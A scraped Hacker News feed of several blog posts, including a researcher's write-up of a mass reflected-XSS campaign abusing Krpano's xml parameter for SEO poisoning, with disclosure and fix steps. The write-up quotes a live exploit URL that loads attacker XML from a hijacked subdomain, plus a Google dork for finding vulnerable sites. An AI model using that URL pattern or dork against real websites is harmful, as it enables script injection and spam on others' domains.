    Algorithms: They favor regular activity over over sporadic one and audiences gravitate toward creators they can rely on

    Engagement: When you post regularly, you build anticipation and loyalty, encouraging your audience to keep coming back.

    Tracking: Without monitoring your progress, it’s easy to lose consistency and miss growth opportunities.

    ]]>
    https://www.caterpace.blue/index/ hacker-news-small-sites-43202269 Fri, 28 Feb 2025 06:10:34 GMT
    <![CDATA[360XSS: Mass Website Exploitation via Virtual Tour Framework for SEO Poisoning]]> thread link) | @timkq
    February 27, 2025 | https://olegzay.com/360xss/ | archive.org

    How I Accidentally Uncover One of the Most Exploited XSS Vulnerabilities Online

    My story begins in a way that many readers of technical blogs might find familiar—just another uneventful evening alone at the computer. For purely educational purposes, I opened a Chrome incognito window, went to Google, and typed the word “porn.” Thanks to my ongoing research in this area, I’m quite familiar with the usual search results. But this time, something unusual caught my eye—a new website appearing in the third row, listed under Yale University’s domain with the title: “++[S*X@Porn-xnxx-Videos!…] Tamil sexy student.” It piqued my curiosity, but not for the reasons you might think.

    Did Yale University Enter the Porn Industry?

    I was almost certain the website had been hacked, but I still wasn’t sure how. My first thought was a subdomain takeover—a common attack where an abandoned CNAME record pointing to an unused asset gets hijacked by an attacker to host malicious content under the original domain. I had previously explored this technique in my research at Guardio, where I coined the term “Subdomailing”.

    To test my theory, I clicked the link to see where it would take me. The page initially loaded what looked like a legitimate platform but quickly redirected me to a random porn ad.

    https://virtualtour.quantuminstitute.yale.edu/?id=yuxs&xml=https://staging-prep-cms.scouts.org.uk/lnk/video/?video=video-xx-indain-girl-xxx-xxxxxxx-xvid-60159.html

    Examining the original URL, a few things stood out: the subdomain name hinted that the site was related to a virtual tour, and an xml parameter contained a suspicious-looking URL—something that definitely needed a deeper look.

    Curious, I tried opening the same URL again but without the parameters—and suddenly, I found myself inside Yale’s Quantum Mechanics Institute. Took a quick tour, impressive place. If you're into quantum computing, worth a look. But honestly, I never really got superposition—how can a bit be both 0 and 1? Seriously, how does that work?? 😂

    …Anyway, back to the point.

    Reversing the Payload

    The xml parameter was clearly the key factor, so I considered the possibility of an open redirect. I modified the parameter value to https://www.example.com, expecting a redirection—but instead, the page threw an error:

    At that point, I knew this was more than just a simple redirect. I hadn’t even checked the original xml parameter yet—and when I did, one thing stood out: the URL belonged to the official UK Scouts website, which seemed suspicious. A quick DNS check confirmed my suspicion—the subdomain had been hijacked through an abandoned Azure account, just as I had explained earlier.

    Then, I examined the response contents of the URL to see what was inside:

    The response was an XML document with an onloaded event containing an eval function executing a Base64-encoded payload—one of the most classic indicators of a malicious XSS (Cross-Site Scripting) payload.

    At that moment, I felt a rush of excitement—this was the first time I had found an actively exploited XSS in the wild. Don’t get me wrong—I strongly oppose malicious activities like this, but the researcher in me couldn’t help but celebrate 😂.

    Beyond the XSS, the main tag <krpano> revealed the underlying technology powering my virtual tour through the quantum institute.

    💡

    Krpano is a popular framework used to host 360° images and videos, enabling the creation of interactive virtual tours and VR experiences. It supports various formats, including gigapixel images and fisheye projections, and allows customization through XML and JavaScript.

    That meant the XSS was either in the framework itself or in the website’s implementation.

    Curious to understand what the payload actually did, I decoded it:

    Nothing particularly sophisticated stood out in the script—except that it fetched a target URL from yet another stolen asset, this time volvo.com, and used the id parameter to identify the ad campaign.

    At this point, I hadn’t even fully started my investigation, and I had already found three abused assets from three major organizations. That’s when I realized—this wasn’t just some random hacker selling services on Telegram. I was dealing with a serious actor—someone with a massive bank of stolen assets and a well-organized operation.

    Zero Day or One Day? 

    Reversing this XSS was a fun ride. At first, I assumed the external XML loading was an intended feature of the Krpano library and that the vulnerability lay in how the XML was parsed. So, I dived into debugging the obfuscated library, searching for the source of truth. After 30 minutes of digging, I finally did what I should’ve done from the beginning—checked the documentation. And there it was:

    The XML onloaded attribute? A documented feature.
    The external xml parameter? A design choice - one that should be disabled in production.

    I came across a crucial configuration setting - passQueryParameter.

    This setting controls whether query parameters from the hosting website are directly passed into Krpano’s configuration. The problem? For years it was enabled by Krpano's default installation. Meaning, any attacker could inject arbitrary XML, leading to reflected XSS if a vulnerable website didn’t explicitly disable it.

    Digging deeper, I found CVE-2020-24901. The description matched exactly what I observed: reflected XSS caused by the passQueryParameter setting. While the original POC used different parameters, the xml parameter was also mentioned. So, was this a one-day? Yes. But somehow, it slipped past too many websites, as you're about to see.

    The Shoemaker's Children Go Barefoot

    In this Krpano forum thread, a user raised concerns about this CVE—a full year after its disclosure. Krpano’s developers downplayed the issue, claiming it was a case of misuse rather than a security flaw. However, they did mention that as of version 1.20.10, they restricted passQueryParameter to an allowlist in an attempt to prevent XSS.

    But here’s the problem.

    Explicitly adding the xml parameter to the allowlist still left the same XSS risk open, and this configuration remained available for use.

    And now, for the best part.

    While browsing Krpano's documentation, I noticed they hosted live examples of their 360° tour framework on their own website. Naturally, I checked their implementation… and guess what? They were vulnerable too.

    Once I cracked the technical side of the vulnerability, I shifted gears—I wanted to understand the bigger picture. How widespread was this campaign? How many other sites had been exploited? That’s when an idea hit me. Instead of chasing leads blindly, why not use my good old friend, Google Dorking?

    inurl:xml=https AND inurl:id=

    And just like that, I opened the Pandora box.

    The sheer scale of this campaign caught me off guard. With a couple of Google searches, I uncovered thousands of ads spread across 350+ exploited websites—and not just any websites.

    Government portals. Entire state websites. Top universities in America. Major hotel chains. News outlets. Car dealerships. Fortune 500 companies. All hijacked and repurposed as SEO tools to spread spam, ads, and shady promotions.

    Most of these sites were very popular and are having millions of visitors each month, and some had been hit multiple times, serving different types of ads.

    And it wasn’t just porn ads anymore. I found diet supplements, online casinos, fake news sites—every kind of sketchy ad we instinctively close without a second thought. But the real surprise? Some of these hijacked pages weren’t even pushing ads—they were being used to boost YouTube views.

    This wasn’t just a spam operation. It was an industrial-scale abuse of trusted domains.

    I also analyzed the xml parameter value. Some were the usual suspects: cheap, throwaway domains registered with privacy-shielded WHOIS info, making it impossible to trace the owners. But others? Hijacked subdomains of major websites.

    XSS for SEO Poisoning 

    Everything about this campaign screamed SEO pros. One of the biggest proofs was right at the beginning of this blog—where I showed how they pushed their ad to the third row in Google search results for one of the most searched terms in the world: "porn". Sure, leveraging Yale University’s domain played a big role in boosting credibility, but pulling off that level of ranking manipulation is still no small feat. 

    In addition to that, the concept itself of a reflected XSS that is used to be promoted in SEO results… Is nothing I’ve seen before, not at this scale. A reflected XSS is a fun vulnerability but on it’s own requires user interaction, and one of the biggest challenges is to make people click your reflected XSS link. So using search engines as a distribution platform for your XSS is a very creative and cool way to do it.

    These guys squeeze every last drop out of every website they compromise. Take Utah’s official website, for example—at the time of my search, it had over 100 indexed spam results

    And keep in mind, my data was limited to Google Dorks, meaning they had likely indexed the same page with different ads hundreds of times beyond what I could see.

    They weren’t just injecting links—they were optimizing them:

    • Controlled the title, description, and preview image.
    • Used random strings in titles to make each result unique.
    • Added fake review counts and star ratings.

    I can’t accurately estimate how many clicks this campaign generated, but judging by its scale, millions wouldn’t be a stretch. 

    But there was still one question that kept bugging me… 

    For some reason, I always assumed that the best way to exploit an XSS was to directly attack the vulnerable website and its user base—stealing cookies, session tokens, or performing actions on behalf of users. However, in this case, all I found was JavaScript executing simple redirects and nothing more 🤔.

    Thinking logically, I came up with two possible reasons why they chose this approach:

    1. They're likely a shady ad firm, more interested in blasting ads everywhere than launching direct cyberattacks. This is probably their most effective monetization strategy.
    2. They’re operating in a legal gray area—while their methods are unethical, they aren't outright criminal. If they stole user data or launched full-fledged attacks, it would escalate the operation into something that attracts law enforcement and investigations. However all they did was to distribute ads.

    But then, while digging through the scraped websites, I stumbled upon something bigger—a website with over half a billion monthly visitors that was treated specially.

    CNN - More Than a Redirect

    This wasn’t just another case of a high-traffic website being compromised. What made it stand out? Clicking the malicious link didn’t redirect me elsewhere—it kept me right on cnn.com, landing on what appeared to be a legitimate CNN article. Same domain, same structure—except the content was in Turkish and the title was “Top Reliable Casinos Online.”

    Who wouldn’t trust an article hosted on CNN, especially when hunting for the most “reliable” online casino?

    This was a smoking gun—proof the attackers knew exactly what they had in their hands. Instead of a cheap redirect, which would be a waste, they embedded their casino promotion directly inside CNN’s domain, disguising it as a real article. They weren’t just hijacking traffic; they were weaponizing trust.

    Digging deeper, the xml payload was hosted on this “unsuspicious” domain "jqeury.store". The homepage on that domain served a list of links to multiple instances of the same CNN exploit, each serving different variations of the casino article.

    But it didn’t stop there. Some links also pointed to "geo.tv"–Pakistan’s largest news site. Opening them revealed the same trick—fake articles injected into a vulnerable endpoint, all promoting the same casino.

    Responsible Disclosure

    The people behind this campaign remain a mystery, but from what I’ve seen, many clues suggest it was run by an Arab group—based on the ads, patterns, and random breadcrumbs I found during my investigation. Either way, I couldn’t care less; that’s a problem for law enforcement. What I can do, however, is try to minimize the damage by reaching out to the biggest brands affected.

    I set out to report as many exploited instances as possible. What I didn’t anticipate was just how difficult that would be. I personally uncovered over 300 exploited domains, yet most had no vulnerability disclosure program. Hours went into tracking down contact emails and submission forms, but most of my reports went nowhere—buried in unread inboxes or bounced back with no response.

    Still, there were wins. Some reports made it through, earning me acknowledgements from major organizations like U.S. Department of Health & Human Services and CERT-EU. A handful of vulnerable assets even got fixed—some thanks to my disclosures, others by sheer coincidence.

    That’s when I decided to start my own blog—to shed light on overlooked attack vectors and reach a wider audience. If there’s one thing this experience reinforced, it’s that these problems extend far beyond a handful of exploited domains—and they don’t get fixed until someone makes enough noise.

    Krpano’s Response

    Alongside my reporting mission, I reached out to Krpano’s developers to highlight the vulnerable implementation on their own website and raise concerns about the handling of the XML parameter. The library’s main developer, Klaus, responded promptly and professionally, taking my report seriously. Within a few weeks, he implemented a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter—effectively closing off this attack vector.

    Big kudos to Klaus 👑

    360XSS: How to Fix It?

    🔍 Identify all instances of Krpano on your website.
    ⬆️ Update to the latest version 1.22.4.
    ❌ Set the passQueryParameter configuration to false.
    🔍 Scan for SEO Poisoning – Find and remove infected pages via Google Search Console.

    Stay Safe 💪🏻
    ]]>
    https://olegzay.com/360xss/ hacker-news-small-sites-43202198 Fri, 28 Feb 2025 06:01:04 GMT
    <![CDATA[Kindness Is Achievement: The Surprising Value of GPT-4.5]]> thread link) | @amoy-tech
    February 27, 2025 | https://amoy-tech.com/blog/id/5970 | archive.org

    Kindness is Achievement: The Surprising Value of GPT-4.5 @安美科技
    ]]>
    https://amoy-tech.com/blog/id/5970 hacker-news-small-sites-43202067 Fri, 28 Feb 2025 05:34:57 GMT
    <![CDATA[Video encoding requires using your eyes]]> thread link) | @zdw
    February 27, 2025 | https://redvice.org/2025/encoding-requires-eyes/ | archive.org

    In multimedia, the quality engineers are optimizing for is perceptual. Eyes, ears, and the brain processing their signals are enormously complex, and there’s no way to replicate everything computationally. There are no “objective” metrics to be had, just various proxies with difficult tradeoffs. Modifying video is particularly thorny, since like I’ve mentioned before on this blog there are various ways to subtly bias perception that are nonetheless undesirable, and are impossible to correct for.

    This means there’s no substitute for actually looking at the results. If you are a video engineer, you must look at sample output and ask yourself if you like what you see. You should do this regularly, but especially if you’re considering changing anything, and even more so if ML is anywhere in your pipeline. You cannot simply point at metrics and say “LGTM”! In this particular domain, if the metrics and skilled human judgement are in conflict, the metrics are usually wrong.

    Netflix wrote a post on their engineering blog about a “deep downscaler” for video, and unfortunately it’s rife with issues. I originally saw the post due to someone citing it, and was incredibly disappointed when I clicked through and read it. Hopefully this post offers a counter to that!

    I’ll walk through the details below, but they’re ultimately all irrelevant; the single image comparison Netflix posted looks like this (please ‘right-click -> open image in new tab’ so you can see the full image and avoid any browser resampling):

    Downscaler comparison

    Note the ringing, bizarre color shift, and seemingly fake “detail”. If the above image is their best example, this should not have shipped – the results look awful, regardless of the metrics. The blog post not acknowledging this is embarrassing, and it makes me wonder how many engineers read this and decided not to say anything.

    The Post

    Okay, going through this section by section:

    How can neural networks fit into Netflix video encoding?

    There are, roughly speaking, two steps to encode a video in our pipeline:

    1. Video preprocessing, which encompasses any transformation applied to the high-quality source video prior to encoding. Video downscaling is the most pertinent example herein, which tailors our encoding to screen resolutions of different devices and optimizes picture quality under varying network conditions. With video downscaling, multiple resolutions of a source video are produced. For example, a 4K source video will be downscaled to 1080p, 720p, 540p and so on. This is typically done by a conventional resampling filter, like Lanczos.

    Ignoring the awful writing[1], it’s curious that they don’t clarify what Netflix was using previously. Is Lanczos an example, or the current best option[2]? This matters because one would hope they establish a baseline to later compare the results against, and that baseline should be the best reasonable existing option.

    2. Video encoding using a conventional video codec, like AV1. Encoding drastically reduces the amount of video data that needs to be streamed to your device, by leveraging spatial and temporal redundancies that exist in a video.

    I once again wonder why they mention AV1, since in this case I know it’s not what the majority of Netflix’s catalog is delivered as; they definitely care about hardware decoder support. Also, this distinction between preprocessing and encoding isn’t nearly as clean as this last sentence implies, since these codecs are lossy, and in a way that is aware of the realities of perceptual quality.

    We identified that we can leverage neural networks (NN) to improve Netflix video quality, by replacing conventional video downscaling with a neural network-based one. This approach, which we dub “deep downscaler,” has a few key advantages:

    I’m sure that since they’re calling it a deep downscaler, it’s actually going to use deep learning, right?

    1. A learned approach for downscaling can improve video quality and be tailored to Netflix content.

    Putting aside my dislike of the phrase “a learned approach” here, I’m very skeptical of “tailored to Netflix content” claim. Netflix’s catalog is pretty broad, and video encoding has seen numerous attempts at content-based specialization that turned out to be worse than focusing on improving things generically and adding tuning knobs. The encoder that arguably most punched above its weight class, x264, was mostly developed on Touhou footage.

    2. It can be integrated as a drop-in solution, i.e., we do not need any other changes on the Netflix encoding side or the client device side. Millions of devices that support Netflix streaming automatically benefit from this solution.

    Take note of this for later: Netflix has many different clients and this assumes no changes to them.

    3. A distinct, NN-based, video processing block can evolve independently, be used beyond video downscaling and be combined with different codecs.

    Doubt

    Of course, we believe in the transformative potential of NN throughout video applications, beyond video downscaling. While conventional video codecs remain prevalent, NN-based video encoding tools are flourishing and closing the performance gap in terms of compression efficiency. The deep downscaler is our pragmatic approach to improving video quality with neural networks.

    “Closing the performance gap” is a rather optimistic framing of that, but I’ll save this for another post.

    Our approach to NN-based video downscaling

    The deep downscaler is a neural network architecture designed to improve the end-to-end video quality by learning a higher-quality video downscaler. It consists of two building blocks, a preprocessing block and a resizing block. The preprocessing block aims to prefilter the video signal prior to the subsequent resizing operation. The resizing block yields the lower-resolution video signal that serves as input to an encoder. We employed an adaptive network design that is applicable to the wide variety of resolutions we use for encoding.

    Downscaler comparison

    I’m not sure exactly what they mean by the adaptive network design here. A friend has suggested that maybe this just means fixed weights on the preprocessing block? I am, however, extremely skeptical of their claim that the results will generate to a wide variety of resolutions. Avoiding overfitting here would be fairly challenging, and there’s nothing in the post that inspires confidence they managed to overcome those difficulties. They hand-wave this away, but it seems critical to the entire project.

    During training, our goal is to generate the best downsampled representation such that, after upscaling, the mean squared error is minimized. Since we cannot directly optimize for a conventional video codec, which is non-differentiable, we exclude the effect of lossy compression in the loop. We focus on a robust downscaler that is trained given a conventional upscaler, like bicubic. Our training approach is intuitive and results in a downscaler that is not tied to a specific encoder or encoding implementation. Nevertheless, it requires a thorough evaluation to demonstrate its potential for broad use for Netflix encoding.

    Finally some details! I was curious how they’d solve the lack of a reference when training a downscaling model, and this sort of explains it; they optimized for PSNR when upscaled back to the original resolution, post-downscaling. My immediate thoughts upon reading this:

    1. Hrm, PSNR isn’t great[3].
    2. Which bicubic are we actually talking about? This is not filling me with confidence that the author knows much about video.
    3. So this is like an autoencoder, but with the decoder replaced with bicubic upscaling?
    4. Doesn’t that mean the second your TV decides to upscale with bilinear this all falls apart?
    5. Does Netflix actually reliably control the upscaling method on client devices[4]? They went out of their way to specify earlier that the project assumed no changes to the clients, after all!
    6. I wouldn’t call this intuitive. To be honest, it sounds kind of dumb and brittle.
    7. Not tying this to a particular encoder is sensible, but their differentiability reason makes no sense.

    The weirdest part here is the problem formulated in this way actually has a closed-form solution, and I bet it’s a lot faster to run than a neural net! ML is potentially good in more ambiguous scenarios, but here you’ve simplified things to the point that you can just do some math and write some code instead[5]!

    Improving Netflix video quality with neural networks

    The goal of the deep downscaler is to improve the end-to-end video quality for the Netflix member. Through our experimentation, involving objective measurements and subjective visual tests, we found that the deep downscaler improves quality across various conventional video codecs and encoding configurations.

    Judging from the example at the start, the subjective visual tests were conducted by the dumb and blind.

    For example, for VP9 encoding and assuming a bicubic upscaler, we measured an average VMAF Bjøntegaard-Delta (BD) rate gain of ~5.4% over the traditional Lanczos downscaling. We have also measured a ~4.4% BD rate gain for VMAF-NEG. We showcase an example result from one of our Netflix titles below. The deep downscaler (red points) delivered higher VMAF at similar bitrate or yielded comparable VMAF scores at a lower bitrate.

    Again, what’s the actual upscaling filter being used? And while I’m glad the VMAF is good, the result looks terrible! This means the VMAF is wrong. But also, the whole reason they’re following up with VMAF is because PSNR is not great and everyone knows it; it’s just convenient to calculate. Finally, how does VP9 come into play here? I’m assuming they’re encoding the downscaled video before upscaling, but the details matter a lot.

    Besides objective measurements, we also conducted human subject studies to validate the visual improvements of the deep downscaler. In our preference-based visual tests, we found that the deep downscaler was preferred by ~77% of test subjects, across a wide range of encoding recipes and upscaling algorithms. Subjects reported a better detail preservation and sharper visual look. A visual example is shown below. [note: example is the one from above]

    And wow, coincidentally, fake detail and oversharpening are common destructive behaviors from ML-based filtering that unsophisticated users will “prefer” despite making the video worse. If this is the bar, just run Warpsharp on everything and call it a day[6]; I’m confident you’ll get a majority of people to say it looks better.

    This example also doesn’t mention what resolution the video was downscaled to, so it’s not clear if this is even representative of actual use-cases. Once again, there are no real details about how the tests with conducted, so I have no way to judge whether the experiment structure made sense.

    We also performed A/B testing to understand the overall streaming impact of the deep downscaler, and detect any device playback issues. Our A/B tests showed QoE improvements without any adverse streaming impact. This shows the benefit of deploying the deep downscaler for all devices streaming Netflix, without playback risks or quality degradation for our members.

    Translating out the jargon, this means they didn’t have a large negative effect on compressability. This is unsurprising.

    How do we apply neural networks at scale efficiently?

    Given our scale, applying neural networks can lead to a significant increase in encoding costs. In order to have a viable solution, we took several steps to improve efficiency.

    Yes, which is why the closed-form solution almost certainly is faster.

    The neural network architecture was designed to be computationally efficient and also avoid any negative visual quality impact. For example, we found that just a few neural network layers were sufficient for our needs. To reduce the input channels even further, we only apply NN-based scaling on luma and scale chroma with a standard Lanczos filter.

    OK cool, so it’s not actually deep. Why should words have meaning, after all? Only needing a couple layers is not too shocking when, again, there’s a closed-form solution available.

    Also, while applying this to only the luma is potentially a nice idea, if it’s shifting the brightness around you can get very weird results. I imagine this is what causes the ‘fake detail’ in the example above.

    We implemented the deep downscaler as an FFmpeg-based filter that runs together with other video transformations, like pixel format conversions. Our filter can run on both CPU and GPU. On a CPU, we leveraged oneDnn to further reduce latency.

    OK sure, everything there runs on FFmpeg so why not this too.

    Integrating neural networks into our next-generation encoding platform

    The Encoding Technologies and Media Cloud Engineering teams at Netflix have jointly innovated to bring Cosmos, our next-generation encoding platform, to life. Our deep downscaler effort was an excellent opportunity to showcase how Cosmos can drive future media innovation at Netflix. The following diagram shows a top-down view of how the deep downscaler was integrated within a Cosmos encoding microservice.

    Downscaler comparison

    Buzzword buzzword buzzword buzzword buzzword. I especially hate “encoding stratum function”.

    A Cosmos encoding microservice can serve multiple encoding workflows. For example, a service can be called to perform complexity analysis for a high-quality input video, or generate encodes meant for the actual Netflix streaming. Within a service, a Stratum function is a serverless layer dedicated to running stateless and computationally-intensive functions. Within a Stratum function invocation, our deep downscaler is applied prior to encoding. Fueled by Cosmos, we can leverage the underlying Titus infrastructure and run the deep downscaler on all our multi-CPU/GPU environments at scale.

    Why is this entire section here? This should all have been deleted. Also, once again, buzzword buzzword buzzword buzzword buzzword.

    What lies ahead

    The deep downscaler paves the path for more NN applications for video encoding at Netflix. But our journey is not finished yet and we strive to improve and innovate. For example, we are studying a few other use cases, such as video denoising. We are also looking at more efficient solutions to applying neural networks at scale. We are interested in how NN-based tools can shine as part of next-generation codecs. At the end of the day, we are passionate about using new technologies to improve Netflix video quality. For your eyes only!

    I’m not sure a downscaler that takes a problem with a closed-form solution and produces terrible results paves the way for much of anything except more buzzword spam. I look forward to seeing what they will come up with for denoising!


    Thanks to Roger Clark and Will Overman for reading a draft of this post. Errors are of course my own.

    ]]>
    https://redvice.org/2025/encoding-requires-eyes/ hacker-news-small-sites-43201720 Fri, 28 Feb 2025 04:33:26 GMT
    <![CDATA[macOS Tips and Tricks (2022)]]> thread link) | @pavel_lishin
    February 27, 2025 | https://saurabhs.org/macos-tips | archive.org

    Unable to extract article]]>
    https://saurabhs.org/macos-tips hacker-news-small-sites-43201417 Fri, 28 Feb 2025 03:34:14 GMT
    <![CDATA[The line scan video picture]]> thread link) | @jfil
    February 27, 2025 | https://writing.leafs.quest/programming-fun/line-scanner | archive.org

    EDIT: Please look at the bottom to see the new code I came up with today!

    As part of my goal of dusting off my online web presence, I made links to quite a few of the public facing services that Adam has made for omg.lol members. Two of those I made were for the photos (drawing.leafs.quest) and the paste service (paste.leafs.quest).

    When I looked at these I found exactly one paste and one picture, both relating to each other. (There are a few more photos now as I've used it to host some images in an earlier blog-post.)

    The image doesn't actually show up properly until you click on it, all you get is a wall of text where I tried to describe what the image was. So, what actually is it?

    Line Scanners

    If you've ever seen the photo finish of a race, you'll see a weirdly distorted photo of the racers. Here's an example from Wikimedia:

    A line scanner image of two cyclist arriving across the finish line

    You're not actually seeing an entire photo here, what you're seeing is a bunch of photos of a single strip of vertical pixels composited side-by-side. That's why the background looks like a big streak, because the camera never sees any other part of the background.

    The reason they do this is it gives them a literal photo of the finish that can tell who came first. The person who won will be the one in front, and you can tell by pixels with this method.

    I'm not quite doing the description justice, but that is close enough for now.

    Why do I want to line scan?

    I am not interested in seeing who is the fastest, or who is first. I am interested in using it as a photography method. With something like this you can translate movement into an image. For instance, here is another fantastic photo from Wikimedia.

    A scan-line image of a cable car in San Francisco

    The description given by Wikimedia is:

    Modern line-scan camera image of a San Francisco cable car, imaged at 4000 frames per second. Note the background, which was unmoving and thus appears as a single vertical stripe.

    This photo, and the bicycle one above both show images taken when the camera is still and the object is stationary. I want to see what happens when we move the camera.

    How does this relate to that weird picture?

    Quite a few years ago my dad was doing those fancy Christmas lights display where you program each one to flash along with music and look really cool. I'm sure we've all seen YouTube videos doing it by now. For the following year he really wanted to include his neighbours houses in the display, but he complained about the camera perspective of the photos of each house not giving a nice view when stitched together. In reality, this was probably such a small issue but it got me thinking originally.

    Then years later I remember driving past a wall full of graffiti and thought about how cool it would be to photograph it. This time I thought about the fact that simply photographing each section then stitching it together would affect the artwork.

    It was around that time that I learned about line-scan camera's and how they work. I wondered if I could use a video clip to emulate a line-scan camera by simply keeping only the middle row of pixels and putting those thing slices side-by-side to form a picture.

    Well, turns out I could! After a little searching online and borrowing a few answers from Stack Overflow I ended up with a script that can convert a video into a mock line-scan image. I tried a few of myself rolling back and forth past my webcam, and while they worked, I wanted something a bit more interesting.

    One of my favourite types of videos to watch is the ones were people just walk around Japan and film the walk. No talking, just a first-person view of the walk. After looking through a few I decided to use Tokyo Yurikamome Train Side Window View - 4K by NIPPONWANDERINGTV. My hope was that using a train video would allow for better vertical stabilization.

    Well, it worked! You can view the image here, and you'll need to zoom in because it's a wide boi. This image is a visual representation of the entire 33 minute video in a single image. It is interesting as you can see some interesting features.

    For instance, check out the below snippet of the picture below.

    A line scan of a train station from a YouTube video. Read the blog explaining this here: https://writing.leafs.quest/programming-fun/Line-Scanner

    This is the entire time that the train was inside the terminal starting at the 1:25 mark. What's interesting is the section where it appears the image is just stretched is actually the time the train is stopped. Because the background is not moving we end up with an image very similar to the background of those earlier bike racers.

    Final Thoughts and Next Steps

    I really like this. I feel it's a different way at looking at the world. I don't know if it will ever work for the scanning of graffiti that I want as it is VERY sensitive to up and down movement. But I still like the effect it comes up with. While I didn't write about, here is another attempt I did with a video where the camera man is walking around Tokyo.

    To my great dismay, I did not save the source of this video. But with this image you can see the up and down movement of each step. It's really interesting to see each person in the image as well.

    My next step is to make this a bit easier to see. I'm thinking instead of having one long image I instead make a video that has the image scrolling, where the right most pixel is the current frame. I'll also be sure to keep the sound in it. Anyway, thanks for reading this long! :O

    I was mucking around with it today and I completely redid the code! Turns out it was entirely unnecessary to save all the frames to images in the first place, and I didn't even need Pillow. With a fair bit of stack overflow I managed to figure out how to do it all with just opencv-python! Checkout the new code here!

    ]]>
    https://writing.leafs.quest/programming-fun/line-scanner hacker-news-small-sites-43201209 Fri, 28 Feb 2025 02:53:37 GMT
    <![CDATA[Studio 5, The Stars: The 1961 short story that anticipated the issue of Gen AI]]> thread link) | @ecliptik
    February 27, 2025 | https://aroundscifi.us/en/studio-5-the-stars-ballards-1961-short-that-already-told-the-story-of-text-generating-ais/ | archive.org

    As early as 1961 (in the short story Studio 5, The Stars), Ballard anticipated one of the most topical and controversial issues of the day: The generation of texts with machines (or AIs).

    Studio 5, The Stars: Ballard’s 1961 short story that anticipated the issue of generative AI
    Studio 5, The Stars: Ballard’s 1961 short story that anticipated the issue of generative AI

    Let me first explain how this came to pass. Well, from time to time I get together with a few friends at an old hunting lodge in a small grove not too far from my home. Imagine something like the Dead Poets Society of the movies. But we are less esoteric and have fewer hormones in our systems. We get together, have a few beers, and talk about books and stories. We look into each other's eyes and breathe the same air. In some ways, it is one of the most human dimensions we experience: We pick up shards of awe by looking at other people's faces. Amazing.

     Dead Poets Society movie scene The cave where the boys in the group gather to read and talk freely, in violation of the rules of the college. - Here
    Dead Poets Society: The cave where the boys of the group gather to read and talk freely, in violation of the rules of the college. - Here

    But beyond this. At our last meeting, I shared with the others a Ballard (1930-2009) story that I had never read. The great thing is that it happened to me; I did not choose it. The way it works is that each of us brings something to read and then gives it to a group member of his choice. I was given Ballard's Studio 5 The Stars short story, first published in Science Fantasy magazine in 1961.

    The Verse-Transcriber

    Ballard was Ballard! We know that he loved to describe, that he loved difficult and courtly words, that he was a fan of music, art, and mysticism. Ballard was a very erudite writer, so much so that sometimes it's hard to keep up with what he wrote, with the references he made. He always gave me the idea of someone in the middle of a pyramid of fiction and non-fiction books, studying astral maps and catching up on the physical and mathematical theories of his time (not very different from those of today). Or I imagine him wandering around some museum, some gipsoteca, some art gallery. In short, when I started reading, I expected to find his quirks, the secrets you already know he won't tell you, and all the information he puts into the stories that you can only really understand on the third or even fourth reading. Instead, I was confronted with the VT (Verse-Transcriber), a machine that can produce texts based on initial parameters provided by the writer. Similar to prompts you use with an AI.

    Wave IX

    When I read about this VT thing, I stopped. The others looked at me.
    “So, Michael, are ya gonna read?”
    “Get what Ballard means, guys?”
    “Nope, but if you keep reading, we might.”
    Well, I read on.
    The story is set in Vermilion Sands (a fictional dystopic Ballard's place), where Paul Ransom, the main character, runs a publishing company that, among other things, produces a magazine that publishes poetry (Wave IX). All the texts are generated by the VT, which is built by an IBM agency in a place named Red Beach. The heart of the story centers on Ransom’s encounter with his mysterious new neighbor, Aurora Day. Every night and every morning, long strips of paper invade Ransom's yard, blow by the wind: they are Aurora Day’s poetry. Fascinated and repulsed by this elusive woman, Ransom takes an interest in her. He even steps in to save her from falling off a cliff during a mystical night walk of hers.

    Erichtho Muse by John Hamilton Mortimer
    Erichtho Muse by John Hamilton Mortimer

    Evil Witch or Muse of Poetry?

    Ballard's story orients our perceptions toward his habitual lunar light, his enigmatic reflections, his glow plays, his olfactory and auditory dystopias, in short, his typical science fiction writing. But what caught my attention was precisely the VT, this machine capable of producing written text, which in Studio 5, The Stars has so invaded human creative space that writers and poets no longer even remember how to write directly, that is, without the mediation of a machine. Aurora Day's role in this affair is to play the mythological Muse of Poetry Melander, to whom the fate of the young poet Corydon is linked, and who, in order to fulfill her desires, goes so far as to kill himself to create unforgettable poetic verse. Aurora Day/Melander’s intention seems to be to force the writers and poets working for Ransom to return to the true essence of the art of writing and literature by destroying the VTs in their possession and starting to write by hand again. The only one who succeeds is the young Tristram Caldwell, who has never used VT to write, preferring to continue in the more “human” way. He is the Corydon of the story.

    I agreed with him, but of course Tony was somewhat prejudiced there, being one of those people who believed that literature was in essence both unreadable and unwritable. The automatic novel he had been „writing“ was over ten million words long, intended to be one of those gigantic grotesques that tower over the highways of literary history, terrifying the unwary traveller.
    [From Studio 5, The Stars]

    VT: the end of the art of writing

    Paul Ransom is convinced that his strange neighbor is a deranged, bored rich woman. She is so caught up in her own personal fantasies that she can no longer distinguish them from reality. This is partly true. Aurora Day seems to be some kind of witch, followed everywhere by a hideous faun butler (with goat-like features). Life and death do not matter to her, nor does love; all that matters is art, the passion for poetry, for literary purity. She plays a role that she is trapped in, convinced that she is some kind of inspiring muse and is destined to fulfill her destiny, even to the point of killing and persecuting those who do not want to follow her. A creepy character, but one who forces others to ask themselves if the use of machines to replace writers and poets is the end of the art of writing:

    She looked up at me idly, tracing patterns across the surface of the pool with a green-tipped finger.
    “It all depends on you and your companions. When will you come to your senses and become poets again?”
    I watched the patterns in the pool. In some miraculous way they remained etched across the surface.
    In the hours, like millennia, we had sat together I seemed to have told her everything about myself, yet learned almost nothing about Aurora. One thing alone was clear—her obsession with the art of poetry. In some curious way she regarded herself as personally responsible for the present ebb at which it found itself, but her only remedy seemed completely retrogressive.
    “You must come and meet my friends at the colony,” I suggested.
    “I will,” she said. “I hope I can help them. They all have so much to learn.”
    I smiled at this. “I‘m afraid you won‘t find them very sympathetic to that view. Most of them regard themselves as virtuosos. For them the quest for the perfect sonnet ended years ago. The computer produces nothing else.”
    Aurora scoffed. “They’re not poets but mere mechanics. Look at these collections of so-called verse. Three poems and sixty pages of operating instructions. Nothing but volts and amps. When I say they have everything to learn, I mean about their own hearts, not about technique; about the soul of music, not its form.”
    She paused to stretch herself, her beautiful body uncoiling like a python. She leaned forward and began to speak earnestly. “Poetry is dead today, not because of these machines, but because poets no longer search for their true inspiration.”
    “Which is?”
    Aurora shook her head sadly. “You call yourself a poet and yet you ask me that?”
    [From Studio 5, The Stars]
